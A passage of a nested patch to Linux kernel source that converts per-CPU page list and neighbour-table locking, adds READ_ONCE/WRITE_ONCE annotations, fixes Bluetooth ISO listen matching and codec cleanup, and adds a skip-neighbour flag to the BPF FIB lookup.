+ 	unsigned long __maybe_unused UP_flags;
+ 
+-	/*
+-	 * spin_trylock may fail due to a parallel drain. In the future, the
+-	 * trylock will also protect against IRQ reentrancy.
+-	 */
++	/* spin_trylock may fail due to a parallel drain or IRQ reentrancy. */
+ 	pcp_trylock_prepare(UP_flags);
+-	pcp = pcp_spin_trylock_irqsave(zone->per_cpu_pageset, flags);
++	pcp = pcp_spin_trylock(zone->per_cpu_pageset);
+ 	if (!pcp) {
+ 		pcp_trylock_finish(UP_flags);
+ 		return NULL;
+@@ -3802,7 +3789,7 @@ static struct page *rmqueue_pcplist(struct zone *preferred_zone,
+ 	pcp->free_factor >>= 1;
+ 	list = &pcp->lists[order_to_pindex(migratetype, order)];
+ 	page = __rmqueue_pcplist(zone, order, migratetype, alloc_flags, pcp, list);
+-	pcp_spin_unlock_irqrestore(pcp, flags);
++	pcp_spin_unlock(pcp);
+ 	pcp_trylock_finish(UP_flags);
+ 	if (page) {
+ 		__count_zid_vm_events(PGALLOC, page_zonenum(page), 1 << order);
+@@ -5373,7 +5360,6 @@ unsigned long __alloc_pages_bulk(gfp_t gfp, int preferred_nid,
+ 			struct page **page_array)
+ {
+ 	struct page *page;
+-	unsigned long flags;
+ 	unsigned long __maybe_unused UP_flags;
+ 	struct zone *zone;
+ 	struct zoneref *z;
+@@ -5455,9 +5441,9 @@ unsigned long __alloc_pages_bulk(gfp_t gfp, int preferred_nid,
+ 	if (unlikely(!zone))
+ 		goto failed;
+ 
+-	/* Is a parallel drain in progress? */
++	/* spin_trylock may fail due to a parallel drain or IRQ reentrancy. */
+ 	pcp_trylock_prepare(UP_flags);
+-	pcp = pcp_spin_trylock_irqsave(zone->per_cpu_pageset, flags);
++	pcp = pcp_spin_trylock(zone->per_cpu_pageset);
+ 	if (!pcp)
+ 		goto failed_irq;
+ 
+@@ -5476,7 +5462,7 @@ unsigned long __alloc_pages_bulk(gfp_t gfp, int preferred_nid,
+ 		if (unlikely(!page)) {
+ 			/* Try and allocate at least one page */
+ 			if (!nr_account) {
+-				pcp_spin_unlock_irqrestore(pcp, flags);
++				pcp_spin_unlock(pcp);
+ 				goto failed_irq;
+ 			}
+ 			break;
+@@ -5491,7 +5477,7 @@ unsigned long __alloc_pages_bulk(gfp_t gfp, int preferred_nid,
+ 		nr_populated++;
+ 	}
+ 
+-	pcp_spin_unlock_irqrestore(pcp, flags);
++	pcp_spin_unlock(pcp);
+ 	pcp_trylock_finish(UP_flags);
+ 
+ 	__count_zid_vm_events(PGALLOC, zone_idx(zone), nr_account);
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index fa4dd5fab0d44..d13b498f148cc 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2783,6 +2783,7 @@ void hci_release_dev(struct hci_dev *hdev)
+ 	hci_conn_params_clear_all(hdev);
+ 	hci_discovery_filter_clear(hdev);
+ 	hci_blocked_keys_clear(hdev);
++	hci_codec_list_clear(&hdev->local_codecs);
+ 	hci_dev_unlock(hdev);
+ 
+ 	ida_simple_remove(&hci_index_ida, hdev->id);
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index 83eaf25ece465..e4d8857716eb7 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -32,6 +32,7 @@
+ 
+ #include "hci_request.h"
+ #include "hci_debugfs.h"
++#include "hci_codec.h"
+ #include "a2mp.h"
+ #include "amp.h"
+ #include "smp.h"
+diff --git a/net/bluetooth/hci_request.h b/net/bluetooth/hci_request.h
+index b9c5a98238374..0be75cf0efed8 100644
+--- a/net/bluetooth/hci_request.h
++++ b/net/bluetooth/hci_request.h
+@@ -71,7 +71,5 @@ struct sk_buff *hci_prepare_cmd(struct hci_dev *hdev, u16 opcode, u32 plen,
+ void hci_req_add_le_scan_disable(struct hci_request *req, bool rpa_le_conn);
+ void hci_req_add_le_passive_scan(struct hci_request *req);
+ 
+-void hci_req_prepare_suspend(struct hci_dev *hdev, enum suspended_state next);
+-
+ void hci_request_setup(struct hci_dev *hdev);
+ void hci_request_cancel_all(struct hci_dev *hdev);
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 2ae038dfc39f7..5218c4dfe0a89 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -412,11 +412,6 @@ static int hci_le_scan_restart_sync(struct hci_dev *hdev)
+ 					   LE_SCAN_FILTER_DUP_ENABLE);
+ }
+ 
+-static int le_scan_restart_sync(struct hci_dev *hdev, void *data)
+-{
+-	return hci_le_scan_restart_sync(hdev);
+-}
+-
+ static void le_scan_restart(struct work_struct *work)
+ {
+ 	struct hci_dev *hdev = container_of(work, struct hci_dev,
+@@ -426,15 +421,15 @@ static void le_scan_restart(struct work_struct *work)
+ 
+ 	bt_dev_dbg(hdev, "");
+ 
+-	hci_dev_lock(hdev);
+-
+-	status = hci_cmd_sync_queue(hdev, le_scan_restart_sync, NULL, NULL);
++	status = hci_le_scan_restart_sync(hdev);
+ 	if (status) {
+ 		bt_dev_err(hdev, "failed to restart LE scan: status %d",
+ 			   status);
+-		goto unlock;
++		return;
+ 	}
+ 
++	hci_dev_lock(hdev);
++
+ 	if (!test_bit(HCI_QUIRK_STRICT_DUPLICATE_FILTER, &hdev->quirks) ||
+ 	    !hdev->discovery.scan_start)
+ 		goto unlock;
+@@ -5033,6 +5028,7 @@ int hci_dev_close_sync(struct hci_dev *hdev)
+ 	memset(hdev->eir, 0, sizeof(hdev->eir));
+ 	memset(hdev->dev_class, 0, sizeof(hdev->dev_class));
+ 	bacpy(&hdev->random_addr, BDADDR_ANY);
++	hci_codec_list_clear(&hdev->local_codecs);
+ 
+ 	hci_dev_put(hdev);
+ 	return err;
+diff --git a/net/bluetooth/iso.c b/net/bluetooth/iso.c
+index 5cd2e775915be..91e990accbf20 100644
+--- a/net/bluetooth/iso.c
++++ b/net/bluetooth/iso.c
+@@ -458,7 +458,7 @@ drop:
+ }
+ 
+ /* -------- Socket interface ---------- */
+-static struct sock *__iso_get_sock_listen_by_addr(bdaddr_t *ba)
++static struct sock *__iso_get_sock_listen_by_addr(bdaddr_t *src, bdaddr_t *dst)
+ {
+ 	struct sock *sk;
+ 
+@@ -466,7 +466,10 @@ static struct sock *__iso_get_sock_listen_by_addr(bdaddr_t *ba)
+ 		if (sk->sk_state != BT_LISTEN)
+ 			continue;
+ 
+-		if (!bacmp(&iso_pi(sk)->src, ba))
++		if (bacmp(&iso_pi(sk)->dst, dst))
++			continue;
++
++		if (!bacmp(&iso_pi(sk)->src, src))
+ 			return sk;
+ 	}
+ 
+@@ -910,7 +913,7 @@ static int iso_listen_cis(struct sock *sk)
+ 
+ 	write_lock(&iso_sk_list.lock);
+ 
+-	if (__iso_get_sock_listen_by_addr(&iso_pi(sk)->src))
++	if (__iso_get_sock_listen_by_addr(&iso_pi(sk)->src, &iso_pi(sk)->dst))
+ 		err = -EADDRINUSE;
+ 
+ 	write_unlock(&iso_sk_list.lock);
+diff --git a/net/bridge/br_arp_nd_proxy.c b/net/bridge/br_arp_nd_proxy.c
+index e5e48c6e35d78..b45c00c01dea1 100644
+--- a/net/bridge/br_arp_nd_proxy.c
++++ b/net/bridge/br_arp_nd_proxy.c
+@@ -192,7 +192,7 @@ void br_do_proxy_suppress_arp(struct sk_buff *skb, struct net_bridge *br,
+ 	if (n) {
+ 		struct net_bridge_fdb_entry *f;
+ 
+-		if (!(n->nud_state & NUD_VALID)) {
++		if (!(READ_ONCE(n->nud_state) & NUD_VALID)) {
+ 			neigh_release(n);
+ 			return;
+ 		}
+@@ -452,7 +452,7 @@ void br_do_suppress_nd(struct sk_buff *skb, struct net_bridge *br,
+ 	if (n) {
+ 		struct net_bridge_fdb_entry *f;
+ 
+-		if (!(n->nud_state & NUD_VALID)) {
++		if (!(READ_ONCE(n->nud_state) & NUD_VALID)) {
+ 			neigh_release(n);
+ 			return;
+ 		}
+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index 812bd7e1750b6..01d690d9fe5f8 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -277,7 +277,8 @@ int br_nf_pre_routing_finish_bridge(struct net *net, struct sock *sk, struct sk_
+ 		struct nf_bridge_info *nf_bridge = nf_bridge_info_get(skb);
+ 		int ret;
+ 
+-		if ((neigh->nud_state & NUD_CONNECTED) && neigh->hh.hh_len) {
++		if ((READ_ONCE(neigh->nud_state) & NUD_CONNECTED) &&
++		    READ_ONCE(neigh->hh.hh_len)) {
+ 			neigh_hh_bridge(&neigh->hh, skb);
+ 			skb->dev = nf_bridge->physindev;
+ 			ret = br_handle_frame_finish(net, sk, skb);
+@@ -293,7 +294,7 @@ int br_nf_pre_routing_finish_bridge(struct net *net, struct sock *sk, struct sk_
+ 			/* tell br_dev_xmit to continue with forwarding */
+ 			nf_bridge->bridged_dnat = 1;
+ 			/* FIXME Need to refragment */
+-			ret = neigh->output(neigh, skb);
++			ret = READ_ONCE(neigh->output)(neigh, skb);
+ 		}
+ 		neigh_release(neigh);
+ 		return ret;
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 9fd7c88b5db4e..adc327f4af1e9 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -2197,7 +2197,7 @@ static int bpf_out_neigh_v6(struct net *net, struct sk_buff *skb,
+ 			return -ENOMEM;
+ 	}
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	if (!nh) {
+ 		dst = skb_dst(skb);
+ 		nexthop = rt6_nexthop(container_of(dst, struct rt6_info, dst),
+@@ -2210,10 +2210,12 @@ static int bpf_out_neigh_v6(struct net *net, struct sk_buff *skb,
+ 		int ret;
+ 
+ 		sock_confirm_neigh(skb, neigh);
++		local_bh_disable();
+ 		dev_xmit_recursion_inc();
+ 		ret = neigh_output(neigh, skb, false);
+ 		dev_xmit_recursion_dec();
+-		rcu_read_unlock_bh();
++		local_bh_enable();
++		rcu_read_unlock();
+ 		return ret;
+ 	}
+ 	rcu_read_unlock_bh();
+@@ -2295,7 +2297,7 @@ static int bpf_out_neigh_v4(struct net *net, struct sk_buff *skb,
+ 			return -ENOMEM;
+ 	}
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	if (!nh) {
+ 		struct dst_entry *dst = skb_dst(skb);
+ 		struct rtable *rt = container_of(dst, struct rtable, dst);
+@@ -2307,7 +2309,7 @@ static int bpf_out_neigh_v4(struct net *net, struct sk_buff *skb,
+ 	} else if (nh->nh_family == AF_INET) {
+ 		neigh = ip_neigh_gw4(dev, nh->ipv4_nh);
+ 	} else {
+-		rcu_read_unlock_bh();
++		rcu_read_unlock();
+ 		goto out_drop;
+ 	}
+ 
+@@ -2315,13 +2317,15 @@ static int bpf_out_neigh_v4(struct net *net, struct sk_buff *skb,
+ 		int ret;
+ 
+ 		sock_confirm_neigh(skb, neigh);
++		local_bh_disable();
+ 		dev_xmit_recursion_inc();
+ 		ret = neigh_output(neigh, skb, is_v6gw);
+ 		dev_xmit_recursion_dec();
+-		rcu_read_unlock_bh();
++		local_bh_enable();
++		rcu_read_unlock();
+ 		return ret;
+ 	}
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ out_drop:
+ 	kfree_skb(skb);
+ 	return -ENETDOWN;
+@@ -5674,12 +5678,8 @@ static const struct bpf_func_proto bpf_skb_get_xfrm_state_proto = {
+ #endif
+ 
+ #if IS_ENABLED(CONFIG_INET) || IS_ENABLED(CONFIG_IPV6)
+-static int bpf_fib_set_fwd_params(struct bpf_fib_lookup *params,
+-				  const struct neighbour *neigh,
+-				  const struct net_device *dev, u32 mtu)
++static int bpf_fib_set_fwd_params(struct bpf_fib_lookup *params, u32 mtu)
+ {
+-	memcpy(params->dmac, neigh->ha, ETH_ALEN);
+-	memcpy(params->smac, dev->dev_addr, ETH_ALEN);
+ 	params->h_vlan_TCI = 0;
+ 	params->h_vlan_proto = 0;
+ 	if (mtu)
+@@ -5790,21 +5790,29 @@ static int bpf_ipv4_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 	if (likely(nhc->nhc_gw_family != AF_INET6)) {
+ 		if (nhc->nhc_gw_family)
+ 			params->ipv4_dst = nhc->nhc_gw.ipv4;
+-
+-		neigh = __ipv4_neigh_lookup_noref(dev,
+-						 (__force u32)params->ipv4_dst);
+ 	} else {
+ 		struct in6_addr *dst = (struct in6_addr *)params->ipv6_dst;
+ 
+ 		params->family = AF_INET6;
+ 		*dst = nhc->nhc_gw.ipv6;
+-		neigh = __ipv6_neigh_lookup_noref_stub(dev, dst);
+ 	}
+ 
+-	if (!neigh || !(neigh->nud_state & NUD_VALID))
++	if (flags & BPF_FIB_LOOKUP_SKIP_NEIGH)
++		goto set_fwd_params;
++
++	if (likely(nhc->nhc_gw_family != AF_INET6))
++		neigh = __ipv4_neigh_lookup_noref(dev,
++						  (__force u32)params->ipv4_dst);
++	else
++		neigh = __ipv6_neigh_lookup_noref_stub(dev, params->ipv6_dst);
++
++	if (!neigh || !(READ_ONCE(neigh->nud_state) & NUD_VALID))
+ 		return BPF_FIB_LKUP_RET_NO_NEIGH;
++	memcpy(params->dmac, neigh->ha, ETH_ALEN);
++	memcpy(params->smac, dev->dev_addr, ETH_ALEN);
+ 
+-	return bpf_fib_set_fwd_params(params, neigh, dev, mtu);
++set_fwd_params:
++	return bpf_fib_set_fwd_params(params, mtu);
+ }
+ #endif
+ 
+@@ -5912,24 +5920,33 @@ static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 	params->rt_metric = res.f6i->fib6_metric;
+ 	params->ifindex = dev->ifindex;
+ 
++	if (flags & BPF_FIB_LOOKUP_SKIP_NEIGH)
++		goto set_fwd_params;
++
+ 	/* xdp and cls_bpf programs are run in RCU-bh so rcu_read_lock_bh is
+ 	 * not needed here.
+ 	 */
+ 	neigh = __ipv6_neigh_lookup_noref_stub(dev, dst);
+-	if (!neigh || !(neigh->nud_state & NUD_VALID))
++	if (!neigh || !(READ_ONCE(neigh->nud_state) & NUD_VALID))
+ 		return BPF_FIB_LKUP_RET_NO_NEIGH;
++	memcpy(params->dmac, neigh->ha, ETH_ALEN);
++	memcpy(params->smac, dev->dev_addr, ETH_ALEN);
+ 
+-	return bpf_fib_set_fwd_params(params, neigh, dev, mtu);
++set_fwd_params:
++	return bpf_fib_set_fwd_params(params, mtu);
+ }
+ #endif
+ 
++#define BPF_FIB_LOOKUP_MASK (BPF_FIB_LOOKUP_DIRECT | BPF_FIB_LOOKUP_OUTPUT | \
++			     BPF_FIB_LOOKUP_SKIP_NEIGH)
++
+ BPF_CALL_4(bpf_xdp_fib_lookup, struct xdp_buff *, ctx,
+ 	   struct bpf_fib_lookup *, params, int, plen, u32, flags)
+ {
+ 	if (plen < sizeof(*params))
+ 		return -EINVAL;
+ 
+-	if (flags & ~(BPF_FIB_LOOKUP_DIRECT | BPF_FIB_LOOKUP_OUTPUT))
++	if (flags & ~BPF_FIB_LOOKUP_MASK)
+ 		return -EINVAL;
+ 
+ 	switch (params->family) {
+@@ -5967,7 +5984,7 @@ BPF_CALL_4(bpf_skb_fib_lookup, struct sk_buff *, skb,
+ 	if (plen < sizeof(*params))
+ 		return -EINVAL;
+ 
+-	if (flags & ~(BPF_FIB_LOOKUP_DIRECT | BPF_FIB_LOOKUP_OUTPUT))
++	if (flags & ~BPF_FIB_LOOKUP_MASK)
+ 		return -EINVAL;
+ 
+ 	if (params->tot_len)
+diff --git a/net/core/neighbour.c b/net/core/neighbour.c
+index 6c0f2149f2c72..b20c9768d9f3f 100644
+--- a/net/core/neighbour.c
++++ b/net/core/neighbour.c
+@@ -410,7 +410,7 @@ static void neigh_flush_dev(struct neigh_table *tbl, struct net_device *dev,
+ 				 */
+ 				__skb_queue_purge(&n->arp_queue);
+ 				n->arp_queue_len_bytes = 0;
+-				n->output = neigh_blackhole;
++				WRITE_ONCE(n->output, neigh_blackhole);
+ 				if (n->nud_state & NUD_VALID)
+ 					n->nud_state = NUD_NOARP;
+ 				else
+@@ -614,7 +614,7 @@ struct neighbour *neigh_lookup(struct neigh_table *tbl, const void *pkey,
+ 
+ 	NEIGH_CACHE_STAT_INC(tbl, lookups);
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	n = __neigh_lookup_noref(tbl, pkey, dev);
+ 	if (n) {
+ 		if (!refcount_inc_not_zero(&n->refcnt))
+@@ -622,7 +622,7 @@ struct neighbour *neigh_lookup(struct neigh_table *tbl, const void *pkey,
+ 		NEIGH_CACHE_STAT_INC(tbl, hits);
+ 	}
+ 
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 	return n;
+ }
+ EXPORT_SYMBOL(neigh_lookup);
+@@ -920,7 +920,7 @@ static void neigh_suspect(struct neighbour *neigh)
+ {
+ 	neigh_dbg(2, "neigh %p is suspected\n", neigh);
+ 
+-	neigh->output = neigh->ops->output;
++	WRITE_ONCE(neigh->output, neigh->ops->output);
+ }
+ 
+ /* Neighbour state is OK;
+@@ -932,7 +932,7 @@ static void neigh_connect(struct neighbour *neigh)
+ {
+ 	neigh_dbg(2, "neigh %p is connected\n", neigh);
+ 
+-	neigh->output = neigh->ops->connected_output;
++	WRITE_ONCE(neigh->output, neigh->ops->connected_output);
+ }
+ 
+ static void neigh_periodic_work(struct work_struct *work)
+@@ -988,7 +988,9 @@ static void neigh_periodic_work(struct work_struct *work)
+ 			    (state == NUD_FAILED ||
+ 			     !time_in_range_open(jiffies, n->used,
+ 						 n->used + NEIGH_VAR(n->parms, GC_STALETIME)))) {
+-				*np = n->next;
++				rcu_assign_pointer(*np,
++					rcu_dereference_protected(n->next,
++						lockdep_is_held(&tbl->lock)));
+ 				neigh_mark_dead(n);
+ 				write_unlock(&n->lock);
+ 				neigh_cleanup_and_release(n);
+@@ -1093,13 +1095,13 @@ static void neigh_timer_handler(struct timer_list *t)
+ 					  neigh->used +
+ 					  NEIGH_VAR(neigh->parms, DELAY_PROBE_TIME))) {
+ 			neigh_dbg(2, "neigh %p is delayed\n", neigh);
+-			neigh->nud_state = NUD_DELAY;
++			WRITE_ONCE(neigh->nud_state, NUD_DELAY);
+ 			neigh->updated = jiffies;
+ 			neigh_suspect(neigh);
+ 			next = now + NEIGH_VAR(neigh->parms, DELAY_PROBE_TIME);
+ 		} else {
+ 			neigh_dbg(2, "neigh %p is suspected\n", neigh);
+-			neigh->nud_state = NUD_STALE;
++			WRITE_ONCE(neigh->nud_state, NUD_STALE);
+ 			neigh->updated = jiffies;
+ 			neigh_suspect(neigh);
+ 			notify = 1;
+@@ -1109,14 +1111,14 @@ static void neigh_timer_handler(struct timer_list *t)
+ 				   neigh->confirmed +
+ 				   NEIGH_VAR(neigh->parms, DELAY_PROBE_TIME))) {
+ 			neigh_dbg(2, "neigh %p is now reachable\n", neigh);
+-			neigh->nud_state = NUD_REACHABLE;
++			WRITE_ONCE(neigh->nud_state, NUD_REACHABLE);
+ 			neigh->updated = jiffies;
+ 			neigh_connect(neigh);
+ 			notify = 1;
+ 			next = neigh->confirmed + neigh->parms->reachable_time;
+ 		} else {
+ 			neigh_dbg(2, "neigh %p is probed\n", neigh);
+-			neigh->nud_state = NUD_PROBE;
++			WRITE_ONCE(neigh->nud_state, NUD_PROBE);
+ 			neigh->updated = jiffies;
+ 			atomic_set(&neigh->probes, 0);
+ 			notify = 1;
+@@ -1130,7 +1132,7 @@ static void neigh_timer_handler(struct timer_list *t)
+ 
+ 	if ((neigh->nud_state & (NUD_INCOMPLETE | NUD_PROBE)) &&
+ 	    atomic_read(&neigh->probes) >= neigh_max_probes(neigh)) {
+-		neigh->nud_state = NUD_FAILED;
++		WRITE_ONCE(neigh->nud_state, NUD_FAILED);
+ 		notify = 1;
+ 		neigh_invalidate(neigh);
+ 		goto out;
+@@ -1179,7 +1181,7 @@ int __neigh_event_send(struct neighbour *neigh, struct sk_buff *skb,
+ 			atomic_set(&neigh->probes,
+ 				   NEIGH_VAR(neigh->parms, UCAST_PROBES));
+ 			neigh_del_timer(neigh);
+-			neigh->nud_state = NUD_INCOMPLETE;
++			WRITE_ONCE(neigh->nud_state, NUD_INCOMPLETE);
+ 			neigh->updated = now;
+ 			if (!immediate_ok) {
+ 				next = now + 1;
+@@ -1191,7 +1193,7 @@ int __neigh_event_send(struct neighbour *neigh, struct sk_buff *skb,
+ 			}
+ 			neigh_add_timer(neigh, next);
+ 		} else {
+-			neigh->nud_state = NUD_FAILED;
++			WRITE_ONCE(neigh->nud_state, NUD_FAILED);
+ 			neigh->updated = jiffies;
+ 			write_unlock_bh(&neigh->lock);
+ 
+@@ -1201,7 +1203,7 @@ int __neigh_event_send(struct neighbour *neigh, struct sk_buff *skb,
+ 	} else if (neigh->nud_state & NUD_STALE) {
+ 		neigh_dbg(2, "neigh %p is delayed\n", neigh);
+ 		neigh_del_timer(neigh);
+-		neigh->nud_state = NUD_DELAY;
++		WRITE_ONCE(neigh->nud_state, NUD_DELAY);
+ 		neigh->updated = jiffies;
+ 		neigh_add_timer(neigh, jiffies +
+ 				NEIGH_VAR(neigh->parms, DELAY_PROBE_TIME));
+@@ -1313,7 +1315,7 @@ static int __neigh_update(struct neighbour *neigh, const u8 *lladdr,
+ 	neigh_update_flags(neigh, flags, &notify, &gc_update, &managed_update);
+ 	if (flags & (NEIGH_UPDATE_F_USE | NEIGH_UPDATE_F_MANAGED)) {
+ 		new = old & ~NUD_PERMANENT;
+-		neigh->nud_state = new;
++		WRITE_ONCE(neigh->nud_state, new);
+ 		err = 0;
+ 		goto out;
+ 	}
+@@ -1322,7 +1324,7 @@ static int __neigh_update(struct neighbour *neigh, const u8 *lladdr,
+ 		neigh_del_timer(neigh);
+ 		if (old & NUD_CONNECTED)
+ 			neigh_suspect(neigh);
+-		neigh->nud_state = new;
++		WRITE_ONCE(neigh->nud_state, new);
+ 		err = 0;
+ 		notify = old & NUD_VALID;
+ 		if ((old & (NUD_INCOMPLETE | NUD_PROBE)) &&
+@@ -1401,7 +1403,7 @@ static int __neigh_update(struct neighbour *neigh, const u8 *lladdr,
+ 						((new & NUD_REACHABLE) ?
+ 						 neigh->parms->reachable_time :
+ 						 0)));
+-		neigh->nud_state = new;
++		WRITE_ONCE(neigh->nud_state, new);
+ 		notify = 1;
+ 	}
+ 
+@@ -1447,7 +1449,7 @@ static int __neigh_update(struct neighbour *neigh, const u8 *lladdr,
+ 				if (n2)
+ 					n1 = n2;
+ 			}
+-			n1->output(n1, skb);
++			READ_ONCE(n1->output)(n1, skb);
+ 			if (n2)
+ 				neigh_release(n2);
+ 			rcu_read_unlock();
+@@ -1488,7 +1490,7 @@ void __neigh_set_probe_once(struct neighbour *neigh)
+ 	neigh->updated = jiffies;
+ 	if (!(neigh->nud_state & NUD_FAILED))
+ 		return;
+-	neigh->nud_state = NUD_INCOMPLETE;
++	WRITE_ONCE(neigh->nud_state, NUD_INCOMPLETE);
+ 	atomic_set(&neigh->probes, neigh_max_probes(neigh));
+ 	neigh_add_timer(neigh,
+ 			jiffies + max(NEIGH_VAR(neigh->parms, RETRANS_TIME),
+@@ -2174,11 +2176,11 @@ static int neightbl_fill_info(struct sk_buff *skb, struct neigh_table *tbl,
+ 			.ndtc_proxy_qlen	= tbl->proxy_queue.qlen,
+ 		};
+ 
+-		rcu_read_lock_bh();
+-		nht = rcu_dereference_bh(tbl->nht);
++		rcu_read_lock();
++		nht = rcu_dereference(tbl->nht);
+ 		ndc.ndtc_hash_rnd = nht->hash_rnd[0];
+ 		ndc.ndtc_hash_mask = ((1 << nht->hash_shift) - 1);
+-		rcu_read_unlock_bh();
++		rcu_read_unlock();
+ 
+ 		if (nla_put(skb, NDTA_CONFIG, sizeof(ndc), &ndc))
+ 			goto nla_put_failure;
+@@ -2693,15 +2695,15 @@ static int neigh_dump_table(struct neigh_table *tbl, struct sk_buff *skb,
+ 	if (filter->dev_idx || filter->master_idx)
+ 		flags |= NLM_F_DUMP_FILTERED;
+ 
+-	rcu_read_lock_bh();
+-	nht = rcu_dereference_bh(tbl->nht);
++	rcu_read_lock();
++	nht = rcu_dereference(tbl->nht);
+ 
+ 	for (h = s_h; h < (1 << nht->hash_shift); h++) {
+ 		if (h > s_h)
+ 			s_idx = 0;
+-		for (n = rcu_dereference_bh(nht->hash_buckets[h]), idx = 0;
++		for (n = rcu_dereference(nht->hash_buckets[h]), idx = 0;
+ 		     n != NULL;
+-		     n = rcu_dereference_bh(n->next)) {
++		     n = rcu_dereference(n->next)) {
+ 			if (idx < s_idx || !net_eq(dev_net(n->dev), net))
+ 				goto next;
+ 			if (neigh_ifindex_filtered(n->dev, filter->dev_idx) ||
+@@ -2720,7 +2722,7 @@ next:
+ 	}
+ 	rc = skb->len;
+ out:
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 	cb->args[1] = h;
+ 	cb->args[2] = idx;
+ 	return rc;
+@@ -3065,20 +3067,20 @@ void neigh_for_each(struct neigh_table *tbl, void (*cb)(struct neighbour *, void
+ 	int chain;
+ 	struct neigh_hash_table *nht;
+ 
+-	rcu_read_lock_bh();
+-	nht = rcu_dereference_bh(tbl->nht);
++	rcu_read_lock();
++	nht = rcu_dereference(tbl->nht);
+ 
+-	read_lock(&tbl->lock); /* avoid resizes */
++	read_lock_bh(&tbl->lock); /* avoid resizes */
+ 	for (chain = 0; chain < (1 << nht->hash_shift); chain++) {
+ 		struct neighbour *n;
+ 
+-		for (n = rcu_dereference_bh(nht->hash_buckets[chain]);
++		for (n = rcu_dereference(nht->hash_buckets[chain]);
+ 		     n != NULL;
+-		     n = rcu_dereference_bh(n->next))
++		     n = rcu_dereference(n->next))
+ 			cb(n, cookie);
+ 	}
+-	read_unlock(&tbl->lock);
+-	rcu_read_unlock_bh();
++	read_unlock_bh(&tbl->lock);
++	rcu_read_unlock();
+ }
+ EXPORT_SYMBOL(neigh_for_each);
+ 
+@@ -3128,7 +3130,7 @@ int neigh_xmit(int index, struct net_device *dev,
+ 		tbl = neigh_tables[index];
+ 		if (!tbl)
+ 			goto out;
+-		rcu_read_lock_bh();
++		rcu_read_lock();
+ 		if (index == NEIGH_ARP_TABLE) {
+ 			u32 key = *((u32 *)addr);
+ 
+@@ -3140,11 +3142,11 @@ int neigh_xmit(int index, struct net_device *dev,
+ 			neigh = __neigh_create(tbl, addr, dev, false);
+ 		err = PTR_ERR(neigh);
+ 		if (IS_ERR(neigh)) {
+-			rcu_read_unlock_bh();
++			rcu_read_unlock();
+ 			goto out_kfree_skb;
+ 		}
+-		err = neigh->output(neigh, skb);
+-		rcu_read_unlock_bh();
++		err = READ_ONCE(neigh->output)(neigh, skb);
++		rcu_read_unlock();
+ 	}
+ 	else if (index == NEIGH_LINK_TABLE) {
+ 		err = dev_hard_header(skb, dev, ntohs(skb->protocol),
+@@ -3173,7 +3175,7 @@ static struct neighbour *neigh_get_first(struct seq_file *seq)
+ 
+ 	state->flags &= ~NEIGH_SEQ_IS_PNEIGH;
+ 	for (bucket = 0; bucket < (1 << nht->hash_shift); bucket++) {
+-		n = rcu_dereference_bh(nht->hash_buckets[bucket]);
++		n = rcu_dereference(nht->hash_buckets[bucket]);
+ 
+ 		while (n) {
+ 			if (!net_eq(dev_net(n->dev), net))
+@@ -3188,10 +3190,10 @@ static struct neighbour *neigh_get_first(struct seq_file *seq)
+ 			}
+ 			if (!(state->flags & NEIGH_SEQ_SKIP_NOARP))
+ 				break;
+-			if (n->nud_state & ~NUD_NOARP)
++			if (READ_ONCE(n->nud_state) & ~NUD_NOARP)
+ 				break;
+ next:
+-			n = rcu_dereference_bh(n->next);
++			n = rcu_dereference(n->next);
+ 		}
+ 
+ 		if (n)
+@@ -3215,7 +3217,7 @@ static struct neighbour *neigh_get_next(struct seq_file *seq,
+ 		if (v)
+ 			return n;
+ 	}
+-	n = rcu_dereference_bh(n->next);
++	n = rcu_dereference(n->next);
+ 
+ 	while (1) {
+ 		while (n) {
+@@ -3230,10 +3232,10 @@ static struct neighbour *neigh_get_next(struct seq_file *seq,
+ 			if (!(state->flags & NEIGH_SEQ_SKIP_NOARP))
+ 				break;
+ 
+-			if (n->nud_state & ~NUD_NOARP)
++			if (READ_ONCE(n->nud_state) & ~NUD_NOARP)
+ 				break;
+ next:
+-			n = rcu_dereference_bh(n->next);
++			n = rcu_dereference(n->next);
+ 		}
+ 
+ 		if (n)
+@@ -3242,7 +3244,7 @@ next:
+ 		if (++state->bucket >= (1 << nht->hash_shift))
+ 			break;
+ 
+-		n = rcu_dereference_bh(nht->hash_buckets[state->bucket]);
++		n = rcu_dereference(nht->hash_buckets[state->bucket]);
+ 	}
+ 
+ 	if (n && pos)
+@@ -3344,7 +3346,7 @@ static void *neigh_get_idx_any(struct seq_file *seq, loff_t *pos)
+ 
+ void *neigh_seq_start(struct seq_file *seq, loff_t *pos, struct neigh_table *tbl, unsigned int neigh_seq_flags)
+ 	__acquires(tbl->lock)
+-	__acquires(rcu_bh)
++	__acquires(rcu)
+ {
+ 	struct neigh_seq_state *state = seq->private;
+ 
+@@ -3352,9 +3354,9 @@ void *neigh_seq_start(struct seq_file *seq, loff_t *pos, struct neigh_table *tbl
+ 	state->bucket = 0;
+ 	state->flags = (neigh_seq_flags & ~NEIGH_SEQ_IS_PNEIGH);
+ 
+-	rcu_read_lock_bh();
+-	state->nht = rcu_dereference_bh(tbl->nht);
+-	read_lock(&tbl->lock);
++	rcu_read_lock();
++	state->nht = rcu_dereference(tbl->nht);
++	read_lock_bh(&tbl->lock);
+ 
+ 	return *pos ? neigh_get_idx_any(seq, pos) : SEQ_START_TOKEN;
+ }
